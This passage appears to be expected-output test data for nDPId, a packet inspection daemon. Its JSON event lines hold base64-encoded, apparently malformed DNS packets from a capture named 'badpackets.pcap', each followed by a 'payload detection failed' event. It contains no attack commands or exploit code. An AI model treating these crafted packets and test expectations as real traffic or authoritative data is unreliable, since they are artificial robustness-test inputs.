AfOPcKhH1sxV5brmQeQEeenqlUiW5YLjefk+NMQgd+NRuOdvGYchkWl5fnmMau\/HlA+HBNsAZN1e+HH49Qw2zLGAFvFYJOqPF\/HCttPr0DY7fU3q\/deTFsRESwvpQebvinvb3rUKnldKnGamoYPobR4sa3Hc7XJ1UAcE0x56k\/d9TLBNjQCHoPmejklH71ALytcz1kqNyblcIX4lJZisb91+kN14GrJEgCW46spplu2sT6hC4lmdNpv9JaIXIh6VBVmBv4anY3ADAABAAEAABwgAASY2AuEwAwALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAUaOVDQJwftL9gtrUM8RfLB6qSOBXZLTc9Hok\/6MIUcY0p+ZXalXQBQAAAAAAAGEBAAAAAAAAQwAAAAAAAADE0AAAxA=="} 02298{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcGPEgADcRhwSY2AekzLpQ5QA1Q8QLg5NBAMmEAAABAAIABQAPA25zMwNpcnMDZ292AAAcAAHADAAcAAEAABwgABAmEAAwIAAAUwAAAAAAAACQwAwALgABAAAcIAEbABwIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAggGB5zn+E1Pg+FLMqTHnbMA\/oOer5LeX4aIHpNS4o6eo3\/mQLBqkFditZ2io9gnZB4qh2JsMATiESYiHWEYj0bEtKixiKHmqgPaqgsClUlMc36a53fLyVtyHOsfb4Bn06ipKA\/mFDV0+OoNw8Y3Ho1jSbY7bHubvRM+pfr9JzoRxfb3DWL73ZWluCLfXSQajOLrJJnVQ+P2lNfaTK3czYjjMf3wRU9NKWnRGD4+bDy+2RctwKE\/IMs\/GjQVGFjztYPa6p\/mlAS1K5K4FizcZBjmrNEKa71WUgVe3uiPYOufTuXw7A\/z431698ylT38+Lw74o4px+sIHQ1lAUZBM4AMAQAAIAAQAAHCAABgNuczHAEMAQAAIAAQAAHCAABgNuczLAEMAQAAIAAQAAHCAAAsAMwBAAAgABAAAcIAAGA25zNMAQwBAALgABAAAcIAEbAAIIAgAAHCBZK47XWSJGR6xiA2lycwNnb3YAe+rn2tmycvJNbOGLWjldMLdA22UT7xzZh6HJYvuJrE5+qGxJ\/K9yON+rGW5STnO8kj2d7HsVVtkx7ts0\/\/XDYlHvMvWnWK\/Dq3C0qhX4Y4OXOL2k9lkOXDls5DytCZ+qVKg+alb58DzoDOU5yVHtP9rMKfk9VxtfA9LIEQBilUu0fUAjg6x8b2zwKV\/jt6dY6YdR2oAGxQWcfwUhdEB3XcH5NlvhjHUGSlAUPWnm6zjJAgd2MgFTKihm5f+gD+mtCN9sSjuoCyjb\/J+INEr+l8If9XkT6uujAFdNt62xgrprlhR\/4ZT3wgiZkdJcmZ4Hrkq2N2BnT7dMThz1hN6ZBcFsAAEAAQAAHCAABJjYB6TBbAAuAAEAABwgARsAAQgDAAAcIFkrjtdZIkZHrGIDaXJzA2dvdgCNfUC+vOaSAIQikt\/wOmN6FcRNH787rVK7vx8EOTihWPPbRHscOApvDuppsQAybpUJQDSnhmKXzmW0RGA6n2G0ciYqXXOsL0P3\/\/ygg+7XWZuYzKb304Zfx6QfhPLSsEP8shH+rTSNdno\/S62Ol7IpIPQ0RCioobQ2UR\/UDEXTGGbKuR4mDZJLFYeh5tIFpoqvTkHShLjF6v2OlcN8aKTXl7dgMdindVnqMLXbceQ\/g0+K8BgVnEE\/6MZYL80Ns\/V8grnGdCpO48BX8ffkLGatTdnf+50+sN\/QX2lbVRYMuygjrQrIMeAro+VDEin8TTXEdrj+U639Pp8xolDwNQMSwX4AAQABAAAcIAAEmNgHpcF+AC4AAQAAHCABGwABCAMAABwgWSuO11kiRkesYgNpcnMDZ292AAiDKcsFAKyZAPT6\/BqMm4YGNjnILP\/RiBRbrxE19HyRiZVJxwCUqilv0dC8z9SJfb+rPNQabkmaQAfOPcKhH1sxV5brmQeQEeenqlUiW5YLjefk+NMQgd+NRuOdvGYchkWl5fnmMau\/HlA+HBNsAZN1e+HH49Qw2zLGAFvFYJOqPF\/HCttPr0DY7fU3q\/deTFsRESwvpQebvinvb3rUKnldKnGamoYPobR4sa3Hc7XJ1UAcE0x56k\/d9TLBNjQCHoPmejklH71ALytcz1kqNyblcIX4lJZisb91+kN14GrJEgCW46spplu2sT6hC4lmdNpv9JaIXIh6VBVmBv4anY3ADAABAAEAABwgAASY2AuEwAwALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAUaOVDQJwftL9gtrUM8RfLB6qSOBXZLTc9Hok\/6MIUcY0p+ZXalXQBQAAAAAAAGEBAAAAAAAAQwAAAAAAAADE0AAAxA=="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":72,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1467,"global_ts_msec":1495451756278} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":72,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1467,"global_ts_msec":1495451756278}
01300{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":73,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":762,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcGAEgADMRnmeBBg0DzLpQ5QA1ohMIoLZgAPuEEAABAAMABAANBnRpbWUtYgRuaXN0A2dvdgAAAQABwAwAAQABAAAHCAAEgQYPHcAMAC4AAQAABwgAnAABBwMAAAcIWSqP21khSTdNKgRuaXN0A2dvdgB6DVGNpuOznKvdrQN8bwUpu4PENDRSb+5+syaMGo6RaYqni8IQRlgrlLmn0P9fWLeESttBnO35aSL8o+kaUL7kh56Tzeztgfxvi73UEVovSqcWPBrNHp06FMiCkzzWxYm3rwMsy7tgq5QiEQG82TMM5cM\/UdLrrVKTvePPvapChMAMAC4AAQAABwgAnAABBwMAAAcIWSqP21khSTdp9QRuaXN0A2dvdgAH3ZlJ1Plagxurcne6cVxPIYLgmEuZl+Z8WXRbQC0s7YxnKt0M7zxnZKNLd21OfZCww+HGwHXqGzXhrH5S539DqqjEfHlik\/EheQJBrs2wgJD6BuPbFqZ+\/m62e5E1TenoG46sJm2SbQR4t88KGGo41imZHHAUOlsfMJEWeIhOwsD3AAIAAQAABwgABgNnZWHA98D3AAIAAQAABwgABgNiZWHA98D3AC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpNKgRuaXN0A2dvdgB\/AugCl6Rz+sTdMBLd\/b9WzbTmwtSJRElGSiFaNkIXGL85DwZ8CN5XIraessCeREIcUwZxVSCZqTN+jQfSqvs0RCCsELGmZy1\/6te8q\/BHGZ6r5Yfp\/FixyK0YEzCx9kE6yxKwCHgAiZ9RYjXpdk7jwKD9iHCh9psgrmi4EqWisMHDAC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpp9QRuaXN0A2dvdgClTY7jIx2EAO1rRXMS+rZG5e8+PelDpKXOMRzGWIjrQbBJVXqIaZDLeBgBTWgx3tBkiLlUy1bOdR3MF5sPTTggHRJuEc8rRcMhHY6s0g2zr9CNylE8o5Mcs+HT"} 01286{"packet_event_id":1,"packet_event_name":"packet","packet_id":73,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":762,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcGAEgADMRnmeBBg0DzLpQ5QA1ohMIoLZgAPuEEAABAAMABAANBnRpbWUtYgRuaXN0A2dvdgAAAQABwAwAAQABAAAHCAAEgQYPHcAMAC4AAQAABwgAnAABBwMAAAcIWSqP21khSTdNKgRuaXN0A2dvdgB6DVGNpuOznKvdrQN8bwUpu4PENDRSb+5+syaMGo6RaYqni8IQRlgrlLmn0P9fWLeESttBnO35aSL8o+kaUL7kh56Tzeztgfxvi73UEVovSqcWPBrNHp06FMiCkzzWxYm3rwMsy7tgq5QiEQG82TMM5cM\/UdLrrVKTvePPvapChMAMAC4AAQAABwgAnAABBwMAAAcIWSqP21khSTdp9QRuaXN0A2dvdgAH3ZlJ1Plagxurcne6cVxPIYLgmEuZl+Z8WXRbQC0s7YxnKt0M7zxnZKNLd21OfZCww+HGwHXqGzXhrH5S539DqqjEfHlik\/EheQJBrs2wgJD6BuPbFqZ+\/m62e5E1TenoG46sJm2SbQR4t88KGGo41imZHHAUOlsfMJEWeIhOwsD3AAIAAQAABwgABgNnZWHA98D3AAIAAQAABwgABgNiZWHA98D3AC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpNKgRuaXN0A2dvdgB\/AugCl6Rz+sTdMBLd\/b9WzbTmwtSJRElGSiFaNkIXGL85DwZ8CN5XIraessCeREIcUwZxVSCZqTN+jQfSqvs0RCCsELGmZy1\/6te8q\/BHGZ6r5Yfp\/FixyK0YEzCx9kE6yxKwCHgAiZ9RYjXpdk7jwKD9iHCh9psgrmi4EqWisMHDAC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpp9QRuaXN0A2dvdgClTY7jIx2EAO1rRXMS+rZG5e8+PelDpKXOMRzGWIjrQbBJVXqIaZDLeBgBTWgx3tBkiLlUy1bOdR3MF5sPTTggHRJuEc8rRcMhHY6s0g2zr9CNylE8o5Mcs+HT"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":73,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":728,"global_ts_msec":1495451760381} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":73,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":728,"global_ts_msec":1495451760381}
00370{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":74,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"eLr5aHlnxDRrta3ICABFAAXcogYgAEARoZXMulDlS2GodAA12qEF7q5VMVqBoAABAA8ABAABA3d3dwNzc2QEbm9hYQNnb3YA"} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":74,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"eLr5aHlnxDRrta3ICABFAAXcogYgAEARoZXMulDlS2GodAA12qEF7q5VMVqBoAABAA8ABAABA3d3dwNzc2QEbm9hYQNnb3YA"}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":74,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":38,"global_ts_msec":1495451763731} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":74,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":38,"global_ts_msec":1495451763731}
00420{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":75,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":108,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcjkogADURn38YivwdzLpQ5QA1IBMGEoHof96EEwABAAAACAABB2R5bmFtaWMJbGliZXJ0eXByA25ldAAAHAABwBQABgABAAAOEAAkBWRucy0xwBQFYWRtaW7A"} 00406{"packet_event_id":1,"packet_event_name":"packet","packet_id":75,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":108,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcjkogADURn38YivwdzLpQ5QA1IBMGEoHof96EEwABAAAACAABB2R5bmFtaWMJbGliZXJ0eXByA25ldAAAHAABwBQABgABAAAOEAAkBWRucy0xwBQFYWRtaW7A"}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":75,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":74,"global_ts_msec":1495451779464} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":75,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":74,"global_ts_msec":1495451779464}
00420{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":76,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":108,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcjksgADURn34YivwdzLpQ5QA1chAGEkLdh+yEEwABAAAACAABB2R5bmFtaWMJbGliZXJ0eXByA25ldAAAAQABwBQABgABAAAOEAAkBWRucy0xwBQFYWRtaW7A"} 00406{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":108,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcjksgADURn34YivwdzLpQ5QA1chAGEkLdh+yEEwABAAAACAABB2R5bmFtaWMJbGliZXJ0eXByA25ldAAAAQABwBQABgABAAAOEAAkBWRucy0xwBQFYWRtaW7A"}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":76,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":74,"global_ts_msec":1495451779745} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":76,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":74,"global_ts_msec":1495451779745}
00663{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":77,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":286,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcB3MgADsR6J3HK4U1zLpQ5QA1x0sGxG739qGEEAABAAIABgANA3d3dwVpY2FubgNvcmcAAAEAAcAMAAUAAQAADhAACgN3d3cDdmlwwBDADAAuAAEAAA4QAKAABQcDAAAOEFkvMblZE0c+sGYFaWNhbm4Db3JnAFcOXWiLmAn+7RhE3TKRAZ5C+YCLPXSCXHhs6mLxoYLFSB9OmyFE9HQ90+HWIdUDemeRreC546O8dauCK16auNeVpMGVWBmAVkdmYo\/jYS\/f0rb0ZmripWbPcu3lWPDh7GnpYHF2BQ+z6kikiq9qTkmjhshwCrs5yNXSFD+OutJN\/jecwC8AAgABAAAOEAALBGd0bTEDbA=="} 00649{"packet_event_id":1,"packet_event_name":"packet","packet_id":77,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":286,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcB3MgADsR6J3HK4U1zLpQ5QA1x0sGxG739qGEEAABAAIABgANA3d3dwVpY2FubgNvcmcAAAEAAcAMAAUAAQAADhAACgN3d3cDdmlwwBDADAAuAAEAAA4QAKAABQcDAAAOEFkvMblZE0c+sGYFaWNhbm4Db3JnAFcOXWiLmAn+7RhE3TKRAZ5C+YCLPXSCXHhs6mLxoYLFSB9OmyFE9HQ90+HWIdUDemeRreC546O8dauCK16auNeVpMGVWBmAVkdmYo\/jYS\/f0rb0ZmripWbPcu3lWPDh7GnpYHF2BQ+z6kikiq9qTkmjhshwCrs5yNXSFD+OutJN\/jecwC8AAgABAAAOEAALBGd0bTEDbA=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":77,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":252,"global_ts_msec":1495451779762} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":77,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":252,"global_ts_msec":1495451779762}
01830{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":78,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcnoIgADsRANkX04VDzLpQ5QA1ZoEP+cmJ9tyEAAABACEAAAAdBF9ub3MEX3RjcAdub3MtYXZnAmN6AAAhAAHADAAhAAEAAAcIAB0AZAAKAbsKZmUtc2VsZjAwNwdub3MtYXZnAmN6AMAMACEAAQAABwgAHQBkAAoBuwpmZS1zZWxmMDAyB25vcy1hdmcCY3oAwAwAIQABAAAHCAAcAGQACgBQCWZlLXByZzAwNAdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoBuwlmZS1wcmcwMDgHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAFAKZmUtc2VsZjAwNwdub3MtYXZnAmN6AMAMACEAAQAABwgAHQBkAAoAUApmZS1zZWxmMDAyB25vcy1hdmcCY3oAwAwAIQABAAAHCAAdAGQACgG7CmZlLXNlbGYwMDYHbm9zLWF2ZwJjegDADAAhAAEAAAcIABwAZAAKAbsJZmUtcHJnMDAzB25vcy1hdmcCY3oAwAwAIQABAAAHCAAcAGQACgBQCWZlLXByZzAwNgdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoAUAlmZS1wcmcwMDEHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAFAKZmUtc2VsZjAwMwdub3MtYXZnAmN6AMAMACEAAQAABwgAHQBkAAoAUApmZS1zZWxmMDA4B25vcy1hdmcCY3oAwAwAIQABAAAHCAAcAGQACgG7CWZlLXByZzAwNwdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoAUAlmZS1wcmcwMDIHbm9zLWF2ZwJjegDADAAhAAEAAAcIABwAZAAKAFAJZmUtcHJnMDAzB25vcy1hdmcCY3oAwAwAIQABAAAHCAAdAGQACgG7CmZlLXNlbGYwMDgHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAbsKZmUtc2VsZjAwNAdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoBuwlmZS1wcmcwMDUHbm9zLWF2ZwJjegDADAAhAAEAAAcIABwAZAAKAFAJZmUtcHJnMDA3B25vcy1hdmcCY3oAwAwAIQABAAAHCAAdAGQACgG7CmZlLXNlbGYwMDEHbm9zLWF2ZwJjegDADAAhAAEAAAcIABwAZAAKAFAJZmUtcHJnMDA1B25vcy1hdmcCY3oAwAwAIQABAAAHCAAcAGQACgBQCWZlLXByZzAwOAdub3MtYXZnAmN6AMAMACEAAQAABwgAHQBkAAoBuwpmZS1zZWxmMDAzB25vcy1hdmcCY3oAwAwAIQABAAAHCAAdAGQACgBQCmZlLXNlbGYwMDYHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAbsKZmUtc2VsZjAwNQdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoBuwlmZS1wcmcwMDQHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAFAKZmUtc2VsZjAwNAc="} 01816{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcnoIgADsRANkX04VDzLpQ5QA1ZoEP+cmJ9tyEAAABACEAAAAdBF9ub3MEX3RjcAdub3MtYXZnAmN6AAAhAAHADAAhAAEAAAcIAB0AZAAKAbsKZmUtc2VsZjAwNwdub3MtYXZnAmN6AMAMACEAAQAABwgAHQBkAAoBuwpmZS1zZWxmMDAyB25vcy1hdmcCY3oAwAwAIQABAAAHCAAcAGQACgBQCWZlLXByZzAwNAdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoBuwlmZS1wcmcwMDgHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAFAKZmUtc2VsZjAwNwdub3MtYXZnAmN6AMAMACEAAQAABwgAHQBkAAoAUApmZS1zZWxmMDAyB25vcy1hdmcCY3oAwAwAIQABAAAHCAAdAGQACgG7CmZlLXNlbGYwMDYHbm9zLWF2ZwJjegDADAAhAAEAAAcIABwAZAAKAbsJZmUtcHJnMDAzB25vcy1hdmcCY3oAwAwAIQABAAAHCAAcAGQACgBQCWZlLXByZzAwNgdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoAUAlmZS1wcmcwMDEHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAFAKZmUtc2VsZjAwMwdub3MtYXZnAmN6AMAMACEAAQAABwgAHQBkAAoAUApmZS1zZWxmMDA4B25vcy1hdmcCY3oAwAwAIQABAAAHCAAcAGQACgG7CWZlLXByZzAwNwdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoAUAlmZS1wcmcwMDIHbm9zLWF2ZwJjegDADAAhAAEAAAcIABwAZAAKAFAJZmUtcHJnMDAzB25vcy1hdmcCY3oAwAwAIQABAAAHCAAdAGQACgG7CmZlLXNlbGYwMDgHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAbsKZmUtc2VsZjAwNAdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoBuwlmZS1wcmcwMDUHbm9zLWF2ZwJjegDADAAhAAEAAAcIABwAZAAKAFAJZmUtcHJnMDA3B25vcy1hdmcCY3oAwAwAIQABAAAHCAAdAGQACgG7CmZlLXNlbGYwMDEHbm9zLWF2ZwJjegDADAAhAAEAAAcIABwAZAAKAFAJZmUtcHJnMDA1B25vcy1hdmcCY3oAwAwAIQABAAAHCAAcAGQACgBQCWZlLXByZzAwOAdub3MtYXZnAmN6AMAMACEAAQAABwgAHQBkAAoBuwpmZS1zZWxmMDAzB25vcy1hdmcCY3oAwAwAIQABAAAHCAAdAGQACgBQCmZlLXNlbGYwMDYHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAbsKZmUtc2VsZjAwNQdub3MtYXZnAmN6AMAMACEAAQAABwgAHABkAAoBuwlmZS1wcmcwMDQHbm9zLWF2ZwJjegDADAAhAAEAAAcIAB0AZAAKAFAKZmUtc2VsZjAwNAc="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":78,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1129,"global_ts_msec":1495451795488} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":78,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1129,"global_ts_msec":1495451795488}
01231{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":79,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":709,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":709,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcVUIgADoR311APsiTzLpQ5QA1HC4OMzJ8VlCEEAABAAIABgATA25zMgNucmMDZ292AAAcAAHADAAcAAEAAA4QABAgAUnw0GQABhAAAAAAAAGHwAwALgABAAAOEAEbABwHAwAADhBZlIDRWR3Z0YaKA25yYwNnb3YAPWJVgdJKgVrTRsYmmdfgVzqqFqEjtUkbPsBTAyhBqcDqUhyiJ9lBKi0APTMHaoRlm9hKhCaxBf4OosrfcZZZslLTdHCsdWT3HBqF8quhdYgBFhCMYj2GltCBFdXUFuG\/ZMZe\/CYWmCUJwAYCF1Nrid6tA42V3+7Xl7GskBZncS2WWlSxB29bNO5qp\/hzNCvZSu+2CoR2pxntdEHpFyHTMEFW1GIMYaBIBeKmZ9Doz3BzKpSAQQ+2gzTU0pwjmlklQze5+O\/T87VbIrIG0NI6rOWvlrdMZVPfgmbDRUgBonXYW7ys3J4xP6AACqxAfp0yxUWCfy9QuEQQgB+HEB0bVMBXAAIAAQAADhAAAsAMwFcAAgABAAAOEAAGA25zM8BXwFcAAgABAAAOEAAVB2Ruc3NlYzcHZGF0YW10bgNjb20AwFcAAgABAAAOEAALCGRuc3NlYzExwZTAVwACAAEAAA4QAAYDbnMxwFfAVwAuAAEAAA4QARsAAgcCAAAOEFmUgNFZHdnRhooDbnJjA2dvdgCZi7bFn+nZ2P6WVw6o+kkwQuaKLgQuorJ5umHdHNd9400r4gzeBn33Ed0Zu7gD64lr2vhaLbxzLduR1aVAh1X4VlSh2jIQFWHIeoJ8Onasxl0l5tBD7VY1PneeZ1c40Al01eURgN\/WP7woAAMGLHDFWcaVfxALKzEXvlThyjffaO1k\/60LDVhVBDOZ6qeLxCdDVAfYZWLOALT5G71UUp\/mfWeY+zuZZrL9Mg=="} 01217{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":709,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":709,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcVUIgADoR311APsiTzLpQ5QA1HC4OMzJ8VlCEEAABAAIABgATA25zMgNucmMDZ292AAAcAAHADAAcAAEAAA4QABAgAUnw0GQABhAAAAAAAAGHwAwALgABAAAOEAEbABwHAwAADhBZlIDRWR3Z0YaKA25yYwNnb3YAPWJVgdJKgVrTRsYmmdfgVzqqFqEjtUkbPsBTAyhBqcDqUhyiJ9lBKi0APTMHaoRlm9hKhCaxBf4OosrfcZZZslLTdHCsdWT3HBqF8quhdYgBFhCMYj2GltCBFdXUFuG\/ZMZe\/CYWmCUJwAYCF1Nrid6tA42V3+7Xl7GskBZncS2WWlSxB29bNO5qp\/hzNCvZSu+2CoR2pxntdEHpFyHTMEFW1GIMYaBIBeKmZ9Doz3BzKpSAQQ+2gzTU0pwjmlklQze5+O\/T87VbIrIG0NI6rOWvlrdMZVPfgmbDRUgBonXYW7ys3J4xP6AACqxAfp0yxUWCfy9QuEQQgB+HEB0bVMBXAAIAAQAADhAAAsAMwFcAAgABAAAOEAAGA25zM8BXwFcAAgABAAAOEAAVB2Ruc3NlYzcHZGF0YW10bgNjb20AwFcAAgABAAAOEAALCGRuc3NlYzExwZTAVwACAAEAAA4QAAYDbnMxwFfAVwAuAAEAAA4QARsAAgcCAAAOEFmUgNFZHdnRhooDbnJjA2dvdgCZi7bFn+nZ2P6WVw6o+kkwQuaKLgQuorJ5umHdHNd9400r4gzeBn33Ed0Zu7gD64lr2vhaLbxzLduR1aVAh1X4VlSh2jIQFWHIeoJ8Onasxl0l5tBD7VY1PneeZ1c40Al01eURgN\/WP7woAAMGLHDFWcaVfxALKzEXvlThyjffaO1k\/60LDVhVBDOZ6qeLxCdDVAfYZWLOALT5G71UUp\/mfWeY+zuZZrL9Mg=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":79,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":675,"global_ts_msec":1495451801867} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":79,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":675,"global_ts_msec":1495451801867}
00694{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":80,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":310,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":310,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc7j0gADgRdoqiljgTzLpQ5QA13WQG3OQmOZmEAAABAAYABgABDXN0YXRpYy1hc3NldHMDdG9wB2NvbWNhc3QDbmV0AAAwAAHADAAwAAEAAAA8AIgBAAMFAwEAAdNI7Jg7FgzKcoFbbTVFnNS103uNlzSi57w6MSU8g4N7BY45c8wRU0sUX4wCfS5mnvFDJOVeri9\/brOPAihImJbUq1qtU1hWYhriE+Q5okjx68WWhd44ZtMny6bsYRvUiusoqWjg23bXi9ii\/7fg+pccZPnCpi15g6KH4Pi07RLdwAwAMAABAAAAPAE